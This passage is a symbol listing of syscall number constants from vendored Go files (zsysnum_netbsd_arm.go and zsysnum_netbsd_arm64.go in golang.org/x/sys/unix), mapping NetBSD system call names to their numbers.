SYS_PSET_ASSIGN = 414 constant SYS__PSET_BIND (line 217) | SYS__PSET_BIND = 415 constant SYS_POSIX_FADVISE (line 218) | SYS_POSIX_FADVISE = 416 constant SYS_SELECT (line 219) | SYS_SELECT = 417 constant SYS_GETTIMEOFDAY (line 220) | SYS_GETTIMEOFDAY = 418 constant SYS_SETTIMEOFDAY (line 221) | SYS_SETTIMEOFDAY = 419 constant SYS_UTIMES (line 222) | SYS_UTIMES = 420 constant SYS_ADJTIME (line 223) | SYS_ADJTIME = 421 constant SYS_FUTIMES (line 224) | SYS_FUTIMES = 423 constant SYS_LUTIMES (line 225) | SYS_LUTIMES = 424 constant SYS_SETITIMER (line 226) | SYS_SETITIMER = 425 constant SYS_GETITIMER (line 227) | SYS_GETITIMER = 426 constant SYS_CLOCK_GETTIME (line 228) | SYS_CLOCK_GETTIME = 427 constant SYS_CLOCK_SETTIME (line 229) | SYS_CLOCK_SETTIME = 428 constant SYS_CLOCK_GETRES (line 230) | SYS_CLOCK_GETRES = 429 constant SYS_NANOSLEEP (line 231) | SYS_NANOSLEEP = 430 constant SYS___SIGTIMEDWAIT (line 232) | SYS___SIGTIMEDWAIT = 431 constant SYS__LWP_PARK (line 233) | SYS__LWP_PARK = 434 constant SYS_KEVENT (line 234) | SYS_KEVENT = 435 constant SYS_PSELECT (line 235) | SYS_PSELECT = 436 constant SYS_POLLTS (line 236) | SYS_POLLTS = 437 constant SYS_STAT (line 237) | SYS_STAT = 439 constant SYS_FSTAT (line 238) | SYS_FSTAT = 440 constant SYS_LSTAT (line 239) | SYS_LSTAT = 441 constant SYS___SEMCTL (line 240) | SYS___SEMCTL = 442 constant SYS_SHMCTL (line 241) | SYS_SHMCTL = 443 constant SYS_MSGCTL (line 242) | SYS_MSGCTL = 444 constant SYS_GETRUSAGE (line 243) | SYS_GETRUSAGE = 445 constant SYS_TIMER_SETTIME (line 244) | SYS_TIMER_SETTIME = 446 constant SYS_TIMER_GETTIME (line 245) | SYS_TIMER_GETTIME = 447 constant SYS_NTP_GETTIME (line 246) | SYS_NTP_GETTIME = 448 constant SYS_WAIT4 (line 247) | SYS_WAIT4 = 449 constant SYS_MKNOD (line 248) | SYS_MKNOD = 450 constant SYS_FHSTAT (line 249) | SYS_FHSTAT = 451 constant SYS_PIPE2 (line 250) | SYS_PIPE2 = 453 constant SYS_DUP3 (line 251) | SYS_DUP3 = 454 constant SYS_KQUEUE1 (line 252) | SYS_KQUEUE1 = 455 constant SYS_PACCEPT (line 253) | SYS_PACCEPT = 456 constant SYS_LINKAT (line 254) | SYS_LINKAT = 457 constant SYS_RENAMEAT (line 255) | SYS_RENAMEAT = 458 constant SYS_MKFIFOAT (line 256) | SYS_MKFIFOAT = 459 constant SYS_MKNODAT (line 257) | SYS_MKNODAT = 460 constant SYS_MKDIRAT (line 258) | SYS_MKDIRAT = 461 constant SYS_FACCESSAT (line 259) | SYS_FACCESSAT = 462 constant SYS_FCHMODAT (line 260) | SYS_FCHMODAT = 463 constant SYS_FCHOWNAT (line 261) | SYS_FCHOWNAT = 464 constant SYS_FEXECVE (line 262) | SYS_FEXECVE = 465 constant SYS_FSTATAT (line 263) | SYS_FSTATAT = 466 constant SYS_UTIMENSAT (line 264) | SYS_UTIMENSAT = 467 constant SYS_OPENAT (line 265) | SYS_OPENAT = 468 constant SYS_READLINKAT (line 266) | SYS_READLINKAT = 469 constant SYS_SYMLINKAT (line 267) | SYS_SYMLINKAT = 470 constant SYS_UNLINKAT (line 268) | SYS_UNLINKAT = 471 constant SYS_FUTIMENS (line 269) | SYS_FUTIMENS = 472 constant SYS___QUOTACTL (line 270) | SYS___QUOTACTL = 473 constant SYS_POSIX_SPAWN (line 271) | SYS_POSIX_SPAWN = 474 constant SYS_RECVMMSG (line 272) | SYS_RECVMMSG = 475 constant SYS_SENDMMSG (line 273) | SYS_SENDMMSG = 476 FILE: vendor/golang.org/x/sys/unix/zsysnum_netbsd_arm.go constant SYS_EXIT (line 9) | SYS_EXIT = 1 constant SYS_FORK (line 10) | SYS_FORK = 2 constant SYS_READ (line 11) | SYS_READ = 3 constant SYS_WRITE (line 12) | SYS_WRITE = 4 constant SYS_OPEN (line 13) | SYS_OPEN = 5 constant SYS_CLOSE (line 14) | SYS_CLOSE = 6 constant SYS_LINK (line 15) | SYS_LINK = 9 constant SYS_UNLINK (line 16) | SYS_UNLINK = 10 constant SYS_CHDIR (line 17) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 18) | SYS_FCHDIR = 13 constant SYS_CHMOD (line 19) | SYS_CHMOD = 15 constant SYS_CHOWN (line 20) | SYS_CHOWN = 16 constant SYS_BREAK (line 21) | SYS_BREAK = 17 constant SYS_GETPID (line 22) | SYS_GETPID = 20 constant SYS_UNMOUNT (line 23) | SYS_UNMOUNT = 22 constant SYS_SETUID (line 24) | SYS_SETUID = 23 constant SYS_GETUID (line 25) | SYS_GETUID = 24 constant SYS_GETEUID (line 26) | SYS_GETEUID = 25 constant SYS_PTRACE (line 27) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 28) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 29) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 30) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 31) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 32) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 33) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 34) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 35) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 36) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 37) | SYS_SYNC = 36 constant SYS_KILL (line 38) | SYS_KILL = 37 constant SYS_GETPPID (line 39) | SYS_GETPPID = 39 constant SYS_DUP (line 40) | SYS_DUP = 41 constant SYS_PIPE (line 41) | SYS_PIPE = 42 constant SYS_GETEGID (line 42) | SYS_GETEGID = 43 constant SYS_PROFIL (line 43) | SYS_PROFIL = 44 constant SYS_KTRACE (line 44) | SYS_KTRACE = 45 constant SYS_GETGID (line 45) | SYS_GETGID = 47 constant SYS___GETLOGIN (line 46) | SYS___GETLOGIN = 49 constant SYS___SETLOGIN (line 47) | SYS___SETLOGIN = 50 constant SYS_ACCT (line 48) | SYS_ACCT = 51 constant SYS_IOCTL (line 49) | SYS_IOCTL = 54 constant SYS_REVOKE (line 50) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 51) | SYS_SYMLINK = 57 constant SYS_READLINK (line 52) | SYS_READLINK = 58 constant SYS_EXECVE (line 53) | SYS_EXECVE = 59 constant SYS_UMASK (line 54) | SYS_UMASK = 60 constant SYS_CHROOT (line 55) | SYS_CHROOT = 61 constant SYS_VFORK (line 56) | SYS_VFORK = 66 constant SYS_SBRK (line 57) | SYS_SBRK = 69 constant SYS_SSTK (line 58) | SYS_SSTK = 70 constant SYS_VADVISE (line 59) | SYS_VADVISE = 72 constant SYS_MUNMAP (line 60) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 61) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 62) | SYS_MADVISE = 75 constant SYS_MINCORE (line 63) | SYS_MINCORE = 78 constant SYS_GETGROUPS (line 64) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 65) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 66) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 67) | SYS_SETPGID = 82 constant SYS_DUP2 (line 68) | SYS_DUP2 = 90 constant SYS_FCNTL (line 69) | SYS_FCNTL = 92 constant SYS_FSYNC (line 70) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 71) | SYS_SETPRIORITY = 96 constant SYS_CONNECT (line 72) | SYS_CONNECT = 98 constant SYS_GETPRIORITY (line 73) | SYS_GETPRIORITY = 100 constant SYS_BIND (line 74) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 75) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 76) | SYS_LISTEN = 106 constant SYS_GETSOCKOPT (line 77) | SYS_GETSOCKOPT = 118 constant SYS_READV (line 78) | SYS_READV = 120 constant SYS_WRITEV (line 79) | SYS_WRITEV = 121 constant SYS_FCHOWN (line 80) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 81) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 82) | SYS_SETREUID = 126 constant SYS_SETREGID (line 83) | SYS_SETREGID = 127 constant SYS_RENAME (line 84) | SYS_RENAME = 128 constant SYS_FLOCK (line 85) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 86) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 87) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 88) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 89) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 90) | SYS_MKDIR = 136 constant SYS_RMDIR (line 91) | SYS_RMDIR = 137 constant SYS_SETSID (line 92) | SYS_SETSID = 147 constant SYS_SYSARCH (line 93) | SYS_SYSARCH = 165 constant SYS_PREAD (line 94) | SYS_PREAD = 173 constant SYS_PWRITE (line 95) | SYS_PWRITE = 174 constant SYS_NTP_ADJTIME (line 96) | SYS_NTP_ADJTIME = 176 constant SYS_SETGID (line 97) | SYS_SETGID = 181 constant SYS_SETEGID (line 98) | SYS_SETEGID = 182 constant SYS_SETEUID (line 99) | SYS_SETEUID = 183 constant SYS_PATHCONF (line 100) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 101) | SYS_FPATHCONF = 192 constant SYS_GETRLIMIT (line 102) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 103) | SYS_SETRLIMIT = 195 constant SYS_MMAP (line 104) | SYS_MMAP = 197 constant SYS_LSEEK (line 105) | SYS_LSEEK = 199 constant SYS_TRUNCATE (line 106) | SYS_TRUNCATE = 200 constant SYS_FTRUNCATE (line 107) | SYS_FTRUNCATE = 201 constant SYS___SYSCTL (line 108) | SYS___SYSCTL = 202 constant SYS_MLOCK (line 109) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 110) | SYS_MUNLOCK = 204 constant SYS_UNDELETE (line 111) | SYS_UNDELETE = 205 constant SYS_GETPGID (line 112) | SYS_GETPGID = 207 constant SYS_REBOOT (line 113) | SYS_REBOOT = 208 constant SYS_POLL (line 114) | SYS_POLL = 209 constant SYS_SEMGET (line 115) | SYS_SEMGET = 221 constant SYS_SEMOP (line 116) | SYS_SEMOP = 222 constant SYS_SEMCONFIG (line 117) | SYS_SEMCONFIG = 223 constant SYS_MSGGET (line 118) | SYS_MSGGET = 225 constant SYS_MSGSND (line 119) | SYS_MSGSND = 226 constant SYS_MSGRCV (line 120) | SYS_MSGRCV = 227 constant SYS_SHMAT (line 121) | SYS_SHMAT = 228 constant SYS_SHMDT (line 122) | SYS_SHMDT = 230 constant SYS_SHMGET (line 123) | SYS_SHMGET = 231 constant SYS_TIMER_CREATE (line 124) | SYS_TIMER_CREATE = 235 constant SYS_TIMER_DELETE (line 125) | SYS_TIMER_DELETE = 236 constant SYS_TIMER_GETOVERRUN (line 126) | SYS_TIMER_GETOVERRUN = 239 constant SYS_FDATASYNC (line 127) | SYS_FDATASYNC = 241 constant SYS_MLOCKALL (line 128) | SYS_MLOCKALL = 242 constant SYS_MUNLOCKALL (line 129) | SYS_MUNLOCKALL = 243 constant SYS_SIGQUEUEINFO (line 130) | SYS_SIGQUEUEINFO = 245 constant SYS_MODCTL (line 131) | SYS_MODCTL = 246 constant SYS___POSIX_RENAME (line 132) | SYS___POSIX_RENAME = 270 constant SYS_SWAPCTL (line 133) | SYS_SWAPCTL = 271 constant SYS_MINHERIT (line 134) | SYS_MINHERIT = 273 constant SYS_LCHMOD (line 135) | SYS_LCHMOD = 274 constant SYS_LCHOWN (line 136) | SYS_LCHOWN = 275 constant SYS_MSYNC (line 137) | SYS_MSYNC = 277 constant SYS___POSIX_CHOWN (line 138) | SYS___POSIX_CHOWN = 283 constant SYS___POSIX_FCHOWN (line 139) | SYS___POSIX_FCHOWN = 284 constant SYS___POSIX_LCHOWN (line 140) | SYS___POSIX_LCHOWN = 285 constant SYS_GETSID (line 141) | SYS_GETSID = 286 constant SYS___CLONE (line 142) | SYS___CLONE = 287 constant SYS_FKTRACE (line 143) | SYS_FKTRACE = 288 constant SYS_PREADV (line 144) | SYS_PREADV = 289 constant SYS_PWRITEV (line 145) | SYS_PWRITEV = 290 constant SYS___GETCWD (line 146) | SYS___GETCWD = 296 constant SYS_FCHROOT (line 147) | SYS_FCHROOT = 297 constant SYS_LCHFLAGS (line 148) | SYS_LCHFLAGS = 304 constant SYS_ISSETUGID (line 149) | SYS_ISSETUGID = 305 constant SYS_UTRACE (line 150) | SYS_UTRACE = 306 constant SYS_GETCONTEXT (line 151) | SYS_GETCONTEXT = 307 constant SYS_SETCONTEXT (line 152) | SYS_SETCONTEXT = 308 constant SYS__LWP_CREATE (line 153) | SYS__LWP_CREATE = 309 constant SYS__LWP_EXIT (line 154) | SYS__LWP_EXIT = 310 constant SYS__LWP_SELF (line 155) | SYS__LWP_SELF = 311 constant SYS__LWP_WAIT (line 156) | SYS__LWP_WAIT = 312 constant SYS__LWP_SUSPEND (line 157) | SYS__LWP_SUSPEND = 313 constant SYS__LWP_CONTINUE (line 158) | SYS__LWP_CONTINUE = 314 constant SYS__LWP_WAKEUP (line 159) | SYS__LWP_WAKEUP = 315 constant SYS__LWP_GETPRIVATE (line 160) | SYS__LWP_GETPRIVATE = 316 constant SYS__LWP_SETPRIVATE (line 161) | SYS__LWP_SETPRIVATE = 317 constant SYS__LWP_KILL (line 162) | SYS__LWP_KILL = 318 constant SYS__LWP_DETACH (line 163) | SYS__LWP_DETACH = 319 constant SYS__LWP_UNPARK (line 164) | SYS__LWP_UNPARK = 321 constant SYS__LWP_UNPARK_ALL (line 165) | SYS__LWP_UNPARK_ALL = 322 constant SYS__LWP_SETNAME (line 166) | SYS__LWP_SETNAME = 323 constant SYS__LWP_GETNAME (line 167) | SYS__LWP_GETNAME = 324 constant SYS__LWP_CTL (line 168) | SYS__LWP_CTL = 325 constant SYS___SIGACTION_SIGTRAMP (line 169) | SYS___SIGACTION_SIGTRAMP = 340 constant SYS_PMC_GET_INFO (line 170) | SYS_PMC_GET_INFO = 341 constant SYS_PMC_CONTROL (line 171) | SYS_PMC_CONTROL = 342 constant SYS_RASCTL (line 172) | SYS_RASCTL = 343 constant SYS_KQUEUE (line 173) | SYS_KQUEUE = 344 constant SYS__SCHED_SETPARAM (line 174) | SYS__SCHED_SETPARAM = 346 constant SYS__SCHED_GETPARAM (line 175) | SYS__SCHED_GETPARAM = 347 constant SYS__SCHED_SETAFFINITY (line 176) | SYS__SCHED_SETAFFINITY = 348 constant SYS__SCHED_GETAFFINITY (line 177) | SYS__SCHED_GETAFFINITY = 349 constant SYS_SCHED_YIELD (line 178) | SYS_SCHED_YIELD = 350 constant SYS_FSYNC_RANGE (line 179) | SYS_FSYNC_RANGE = 354 constant SYS_UUIDGEN (line 180) | SYS_UUIDGEN = 355 constant SYS_GETVFSSTAT (line 181) | SYS_GETVFSSTAT = 356 constant SYS_STATVFS1 (line 182) | SYS_STATVFS1 = 357 constant SYS_FSTATVFS1 (line 183) | SYS_FSTATVFS1 = 358 constant SYS_EXTATTRCTL (line 184) | SYS_EXTATTRCTL = 360 constant SYS_EXTATTR_SET_FILE (line 185) | SYS_EXTATTR_SET_FILE = 361 constant SYS_EXTATTR_GET_FILE (line 186) | SYS_EXTATTR_GET_FILE = 362 constant SYS_EXTATTR_DELETE_FILE (line 187) | SYS_EXTATTR_DELETE_FILE = 363 constant SYS_EXTATTR_SET_FD (line 188) | SYS_EXTATTR_SET_FD = 364 constant SYS_EXTATTR_GET_FD (line 189) | SYS_EXTATTR_GET_FD = 365 constant SYS_EXTATTR_DELETE_FD (line 190) | SYS_EXTATTR_DELETE_FD = 366 constant SYS_EXTATTR_SET_LINK (line 191) | SYS_EXTATTR_SET_LINK = 367 constant SYS_EXTATTR_GET_LINK (line 192) | SYS_EXTATTR_GET_LINK = 368 constant SYS_EXTATTR_DELETE_LINK (line 193) | SYS_EXTATTR_DELETE_LINK = 369 constant SYS_EXTATTR_LIST_FD (line 194) | SYS_EXTATTR_LIST_FD = 370 constant SYS_EXTATTR_LIST_FILE (line 195) | SYS_EXTATTR_LIST_FILE = 371 constant SYS_EXTATTR_LIST_LINK (line 196) | SYS_EXTATTR_LIST_LINK = 372 constant SYS_SETXATTR (line 197) | SYS_SETXATTR = 375 constant SYS_LSETXATTR (line 198) | SYS_LSETXATTR = 376 constant SYS_FSETXATTR (line 199) | SYS_FSETXATTR = 377 constant SYS_GETXATTR (line 200) | SYS_GETXATTR = 378 constant SYS_LGETXATTR (line 201) | SYS_LGETXATTR = 379 constant SYS_FGETXATTR (line 202) | SYS_FGETXATTR = 380 constant SYS_LISTXATTR (line 203) | SYS_LISTXATTR = 381 constant SYS_LLISTXATTR (line 204) | SYS_LLISTXATTR = 382 constant SYS_FLISTXATTR (line 205) | SYS_FLISTXATTR = 383 constant SYS_REMOVEXATTR (line 206) | SYS_REMOVEXATTR = 384 constant SYS_LREMOVEXATTR (line 207) | SYS_LREMOVEXATTR = 385 constant SYS_FREMOVEXATTR (line 208) | SYS_FREMOVEXATTR = 386 constant SYS_GETDENTS (line 209) | SYS_GETDENTS = 390 constant SYS_SOCKET (line 210) | SYS_SOCKET = 394 constant SYS_GETFH (line 211) | SYS_GETFH = 395 constant SYS_MOUNT (line 212) | SYS_MOUNT = 410 constant SYS_MREMAP (line 213) | SYS_MREMAP = 411 constant SYS_PSET_CREATE (line 214) | SYS_PSET_CREATE = 412 constant SYS_PSET_DESTROY (line 215) | SYS_PSET_DESTROY = 413 constant SYS_PSET_ASSIGN (line 216) | SYS_PSET_ASSIGN = 414 constant SYS__PSET_BIND (line 217) | SYS__PSET_BIND = 415 constant SYS_POSIX_FADVISE (line 218) | SYS_POSIX_FADVISE = 416 constant SYS_SELECT (line 219) | SYS_SELECT = 417 constant SYS_GETTIMEOFDAY (line 220) | SYS_GETTIMEOFDAY = 418 constant SYS_SETTIMEOFDAY (line 221) | SYS_SETTIMEOFDAY = 419 constant SYS_UTIMES (line 222) | SYS_UTIMES = 420 constant SYS_ADJTIME (line 223) | SYS_ADJTIME = 421 constant SYS_FUTIMES (line 224) | SYS_FUTIMES = 423 constant SYS_LUTIMES (line 225) | SYS_LUTIMES = 424 constant SYS_SETITIMER (line 226) | SYS_SETITIMER = 425 constant SYS_GETITIMER (line 227) | SYS_GETITIMER = 426 constant SYS_CLOCK_GETTIME (line 228) | SYS_CLOCK_GETTIME = 427 constant SYS_CLOCK_SETTIME (line 229) | SYS_CLOCK_SETTIME = 428 constant SYS_CLOCK_GETRES (line 230) | SYS_CLOCK_GETRES = 429 constant SYS_NANOSLEEP (line 231) | SYS_NANOSLEEP = 430 constant SYS___SIGTIMEDWAIT (line 232) | SYS___SIGTIMEDWAIT = 431 constant SYS__LWP_PARK (line 233) | SYS__LWP_PARK = 434 constant SYS_KEVENT (line 234) | SYS_KEVENT = 435 constant SYS_PSELECT (line 235) | SYS_PSELECT = 436 constant SYS_POLLTS (line 236) | SYS_POLLTS = 437 constant SYS_STAT (line 237) | SYS_STAT = 439 constant SYS_FSTAT (line 238) | SYS_FSTAT = 440 constant SYS_LSTAT (line 239) | SYS_LSTAT = 441 constant SYS___SEMCTL (line 240) | SYS___SEMCTL = 442 constant SYS_SHMCTL (line 241) | SYS_SHMCTL = 443 constant SYS_MSGCTL (line 242) | SYS_MSGCTL = 444 constant SYS_GETRUSAGE (line 243) | SYS_GETRUSAGE = 445 constant SYS_TIMER_SETTIME (line 244) | SYS_TIMER_SETTIME = 446 constant SYS_TIMER_GETTIME (line 245) | SYS_TIMER_GETTIME = 447 constant SYS_NTP_GETTIME (line 246) | SYS_NTP_GETTIME = 448 constant SYS_WAIT4 (line 247) | SYS_WAIT4 = 449 constant SYS_MKNOD (line 248) | SYS_MKNOD = 450 constant SYS_FHSTAT (line 249) | SYS_FHSTAT = 451 constant SYS_PIPE2 (line 250) | SYS_PIPE2 = 453 constant SYS_DUP3 (line 251) | SYS_DUP3 = 454 constant SYS_KQUEUE1 (line 252) | SYS_KQUEUE1 = 455 constant SYS_PACCEPT (line 253) | SYS_PACCEPT = 456 constant SYS_LINKAT (line 254) | SYS_LINKAT = 457 constant SYS_RENAMEAT (line 255) | SYS_RENAMEAT = 458 constant SYS_MKFIFOAT (line 256) | SYS_MKFIFOAT = 459 constant SYS_MKNODAT (line 257) | SYS_MKNODAT = 460 constant SYS_MKDIRAT (line 258) | SYS_MKDIRAT = 461 constant SYS_FACCESSAT (line 259) | SYS_FACCESSAT = 462 constant SYS_FCHMODAT (line 260) | SYS_FCHMODAT = 463 constant SYS_FCHOWNAT (line 261) | SYS_FCHOWNAT = 464 constant SYS_FEXECVE (line 262) | SYS_FEXECVE = 465 constant SYS_FSTATAT (line 263) | SYS_FSTATAT = 466 constant SYS_UTIMENSAT (line 264) | SYS_UTIMENSAT = 467 constant SYS_OPENAT (line 265) | SYS_OPENAT = 468 constant SYS_READLINKAT (line 266) | SYS_READLINKAT = 469 constant SYS_SYMLINKAT (line 267) | SYS_SYMLINKAT = 470 constant SYS_UNLINKAT (line 268) | SYS_UNLINKAT = 471 constant SYS_FUTIMENS (line 269) | SYS_FUTIMENS = 472 constant SYS___QUOTACTL (line 270) | SYS___QUOTACTL = 473 constant SYS_POSIX_SPAWN (line 271) | SYS_POSIX_SPAWN = 474 constant SYS_RECVMMSG (line 272) | SYS_RECVMMSG = 475 constant SYS_SENDMMSG (line 273) | SYS_SENDMMSG = 476 FILE: vendor/golang.org/x/sys/unix/zsysnum_netbsd_arm64.go constant SYS_EXIT (line 9) | SYS_EXIT = 1 constant SYS_FORK (line 10) | SYS_FORK = 2 constant SYS_READ (line 11) | SYS_READ = 3 constant SYS_WRITE (line 12) | SYS_WRITE = 4 constant SYS_OPEN (line 13) | SYS_OPEN = 5 constant SYS_CLOSE (line 14) | SYS_CLOSE = 6 constant SYS_LINK (line 15) | SYS_LINK = 9 constant SYS_UNLINK (line 16) | SYS_UNLINK = 10 constant SYS_CHDIR (line 17) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 18) | SYS_FCHDIR = 13 constant SYS_CHMOD (line 19) | SYS_CHMOD = 15 constant SYS_CHOWN (line 20) | SYS_CHOWN = 16 constant SYS_BREAK (line 21) | SYS_BREAK = 17 constant SYS_GETPID (line 22) | SYS_GETPID = 20 constant SYS_UNMOUNT (line 23) | SYS_UNMOUNT = 22 constant SYS_SETUID (line 24) | SYS_SETUID = 23 constant SYS_GETUID (line 25) | SYS_GETUID = 24 constant SYS_GETEUID (line 26) | SYS_GETEUID = 25 constant SYS_PTRACE (line 27) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 28) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 29) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 30) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 31) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 32) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 33) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 34) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 35) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 36) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 37) | SYS_SYNC = 36 constant SYS_KILL (line 38) | SYS_KILL = 37 constant SYS_GETPPID (line 39) | SYS_GETPPID = 39 constant SYS_DUP (line 40) | SYS_DUP = 41 constant SYS_PIPE (line 41) | SYS_PIPE = 42 constant SYS_GETEGID (line 42) | SYS_GETEGID = 43 constant SYS_PROFIL (line 43) | SYS_PROFIL = 44 constant SYS_KTRACE (line 44) | SYS_KTRACE = 45 constant SYS_GETGID (line 45) | SYS_GETGID = 47 constant SYS___GETLOGIN (line 46) | SYS___GETLOGIN = 49 constant SYS___SETLOGIN (line 47) | SYS___SETLOGIN = 50 constant SYS_ACCT (line 48) | SYS_ACCT = 51 constant SYS_IOCTL (line 49) | SYS_IOCTL = 54 constant SYS_REVOKE (line 50) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 51) | SYS_SYMLINK = 57 constant SYS_READLINK (line 52) | SYS_READLINK = 58 constant SYS_EXECVE (line 53) | SYS_EXECVE = 59 constant SYS_UMASK (line 54) | SYS_UMASK = 60 constant SYS_CHROOT (line 55) | SYS_CHROOT = 61 constant SYS_VFORK (line 56) | SYS_VFORK = 66 constant SYS_SBRK (line 57) | SYS_SBRK = 69 constant SYS_SSTK (line 58) | SYS_SSTK = 70 constant SYS_VADVISE (line 59) | SYS_VADVISE = 72 constant SYS_MUNMAP (line 60) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 61) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 62) | SYS_MADVISE = 75 constant SYS_MINCORE (line 63) | SYS_MINCORE = 78 constant SYS_GETGROUPS (line 64) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 65) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 66) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 67) | SYS_SETPGID = 82 constant SYS_DUP2 (line 68) | SYS_DUP2 = 90 constant SYS_FCNTL (line 69) | SYS_FCNTL = 92 constant SYS_FSYNC (line 70) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 71) | SYS_SETPRIORITY = 96 constant SYS_CONNECT (line 72) | SYS_CONNECT = 98 constant SYS_GETPRIORITY (line 73) | SYS_GETPRIORITY = 100 constant SYS_BIND (line 74) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 75) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 76) | SYS_LISTEN = 106 constant SYS_GETSOCKOPT (line 77) | SYS_GETSOCKOPT = 118 constant SYS_READV (line 78) | SYS_READV = 120 constant SYS_WRITEV (line 79) | SYS_WRITEV = 121 constant SYS_FCHOWN (line 80) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 81) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 82) | SYS_SETREUID = 126 constant SYS_SETREGID (line 83) | SYS_SETREGID = 127 constant SYS_RENAME (line 84) | SYS_RENAME = 128 constant SYS_FLOCK (line 85) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 86) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 87) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 88) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 89) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 90) | SYS_MKDIR = 136 constant SYS_RMDIR (line 91) | SYS_RMDIR = 137 constant SYS_SETSID (line 92) | SYS_SETSID = 147 constant SYS_SYSARCH (line 93) | SYS_SYSARCH = 165 constant SYS_PREAD (line 94) | SYS_PREAD = 173 constant SYS_PWRITE (line 95) | SYS_PWRITE = 174 constant SYS_NTP_ADJTIME (line 96) | SYS_NTP_ADJTIME = 176 constant SYS_SETGID (line 97) | SYS_SETGID = 181 constant SYS_SETEGID (line 98) | SYS_SETEGID = 182 constant SYS_SETEUID (line 99) | SYS_SETEUID = 183 constant SYS_PATHCONF (line 100) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 101) | SYS_FPATHCONF = 192 constant SYS_GETRLIMIT (line 102) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 103) | SYS_SETRLIMIT = 195 constant SYS_MMAP (line 104) | SYS_MMAP = 197 constant SYS_LSEEK (line 105) | SYS_LSEEK = 199 constant SYS_TRUNCATE (line 106) | SYS_TRUNCATE = 200 constant SYS_FTRUNCATE (line 107) | SYS_FTRUNCATE = 201 constant SYS___SYSCTL (line 108) | SYS___SYSCTL = 202 constant SYS_MLOCK (line 109) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 110) | SYS_MUNLOCK = 204 constant SYS_UNDELETE (line 111) | SYS_UNDELETE = 205 constant SYS_GETPGID (line 112) | SYS_GETPGID = 207 constant SYS_REBOOT (line 113) | SYS_REBOOT = 208 constant SYS_POLL (line 114) | SYS_POLL = 209 constant SYS_SEMGET (line 115) | SYS_SEMGET = 221 constant SYS_SEMOP (line 116) | SYS_SEMOP = 222 constant SYS_SEMCONFIG (line 117) | SYS_SEMCONFIG = 223 constant SYS_MSGGET (line 118) | SYS_MSGGET = 225 constant SYS_MSGSND (line 119) | SYS_MSGSND = 226 constant SYS_MSGRCV (line 120) | SYS_MSGRCV = 227 constant SYS_SHMAT (line 121) | SYS_SHMAT = 228 constant SYS_SHMDT (line 122) | SYS_SHMDT = 230 constant SYS_SHMGET (line 123) | SYS_SHMGET = 231 constant SYS_TIMER_CREATE (line 124) | SYS_TIMER_CREATE = 235 constant SYS_TIMER_DELETE (line 125) | SYS_TIMER_DELETE = 236 constant SYS_TIMER_GETOVERRUN (line 126) | SYS_TIMER_GETOVERRUN = 239 constant SYS_FDATASYNC (line 127) | SYS_FDATASYNC = 241 constant SYS_MLOCKALL (line 128) | SYS_MLOCKALL = 242 constant SYS_MUNLOCKALL (line 129) | SYS_MUNLOCKALL = 243 constant SYS_SIGQUEUEINFO (line 130) | SYS_SIGQUEUEINFO = 245 constant SYS_MODCTL (line 131) | SYS_MODCTL = 246 constant SYS___POSIX_RENAME (line 132) | SYS___POSIX_RENAME = 270 constant SYS_SWAPCTL (line 133) | SYS_SWAPCTL = 271 constant SYS_MINHERIT (line 134) | SYS_MINHERIT = 273 constant SYS_LCHMOD (line 135) | SYS_LCHMOD = 274 constant SYS_LCHOWN (line 136) | 